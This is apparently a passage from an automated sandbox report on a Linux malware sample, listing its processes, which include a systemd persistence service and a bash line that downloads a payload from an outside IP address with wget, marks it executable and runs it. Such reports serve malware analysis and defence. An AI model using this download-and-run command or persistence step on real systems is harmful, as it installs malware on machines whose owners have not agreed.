                Data Ascii: $`P ^4,0\ A00@00 P PW@0 0 \21CT( 0 P`0 020 0 " 0010 0 ! 0
                Jan 11, 2025 06:18:15.298974037 CET1236INData Raw: 2e 9c 81 e1 28 10 8d e2 06 00 91 e8 00 34 a0 e1 23 38 a0 e1 01 10 01 e2 01 20 02 e2 20 6c 83 e1 0c 10 8d e5 10 20 8d e5 30 30 9d e5 34 10 8d e2 06 00 91 e8 01 30 03 e2 01 10 01 e2 01 20 02 e2 14 30 8d e5 18 10 8d e5 1c 20 8d e5 04 50 a0 e1 01 b0
                Data Ascii: .(4#8 l 0040 0 P^b3$0T A00@00 P P`@0 0 T21CL 0 P@0 0


                System Behavior

                Start time (UTC):05:17:57
                Start date (UTC):11/01/2025
                Path:/tmp/5.elf
                Arguments:/tmp/5.elf
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:18:03
                Start date (UTC):11/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:18:03
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:sh -c "systemctl daemon-reload > /dev/null 2>&1"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:18:03
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:18:03
                Start date (UTC):11/01/2025
                Path:/usr/bin/systemctl
                Arguments:systemctl daemon-reload
                File size:996584 bytes
                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                Start time (UTC):05:18:03
                Start date (UTC):11/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:18:03
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:sh -c "systemctl start hello.service > /dev/null 2>&1"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:18:03
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:18:03
                Start date (UTC):11/01/2025
                Path:/usr/bin/systemctl
                Arguments:systemctl start hello.service
                File size:996584 bytes
                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                Start time (UTC):05:17:59
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:17:59
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:17:59
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:17:59
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:17:59
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:17:59
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:17:59
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:17:59
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:17:59
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:17:59
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:18:00
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:18:00
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:18:03
                Start date (UTC):11/01/2025
                Path:/usr/lib/systemd/systemd
                Arguments:-
                File size:1620224 bytes
                MD5 hash:9b2bec7092a40488108543f9334aab75

                Start time (UTC):05:18:03
                Start date (UTC):11/01/2025
                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                File size:22760 bytes
                MD5 hash:3633b075f40283ec938a2a6a89671b0e

                Start time (UTC):05:18:04
                Start date (UTC):11/01/2025
                Path:/usr/lib/systemd/systemd
                Arguments:-
                File size:1620224 bytes
                MD5 hash:9b2bec7092a40488108543f9334aab75

                Start time (UTC):05:18:04
                Start date (UTC):11/01/2025
                Path:/bin/bash
                Arguments:/bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"
                File size:1183448 bytes
                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                Start time (UTC):05:18:04
                Start date (UTC):11/01/2025
                Path:/bin/bash
                Arguments:-
                File size:1183448 bytes
                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                Start time (UTC):05:18:04
                Start date (UTC):11/01/2025
                Path:/usr/bin/sleep
                Arguments:sleep 10
                File size:39256 bytes
                MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                Start time (UTC):05:18:14
                Start date (UTC):11/01/2025
                Path:/bin/bash
                Arguments:-
                File size:1183448 bytes
                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                Start time (UTC):05:18:14
                Start date (UTC):11/01/2025
                Path:/usr/bin/rm
                Arguments:rm -rf /tmp/5
                File size:72056 bytes
                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                Start time (UTC):05:18:14
                Start date (UTC):11/01/2025
                Path:/bin/bash
                Arguments:-
                File size:1183448 bytes
                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                Start time (UTC):05:18:14
                Start date (UTC):11/01/2025
                Path:/usr/bin/wget
                Arguments:wget http://103.136.41.100/5 -O /tmp/5
                File size:548568 bytes
                MD5 hash:996940118df7bb2aaa718589d4e95c08

                Start time (UTC):05:18:15
                Start date (UTC):11/01/2025
                Path:/bin/bash
                Arguments:-
                File size:1183448 bytes
                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                Start time (UTC):05:18:15
                Start date (UTC):11/01/2025
                Path:/usr/bin/chmod
                Arguments:chmod 777 /tmp/5
                File size:63864 bytes
                MD5 hash:739483b900c045ae1374d6f53a86a279

                Start time (UTC):05:18:15
                Start date (UTC):11/01/2025
                Path:/bin/bash
                Arguments:-
                File size:1183448 bytes
                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                Start time (UTC):05:18:15
                Start date (UTC):11/01/2025
                Path:/tmp/5
                Arguments:/tmp/5 .p1
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1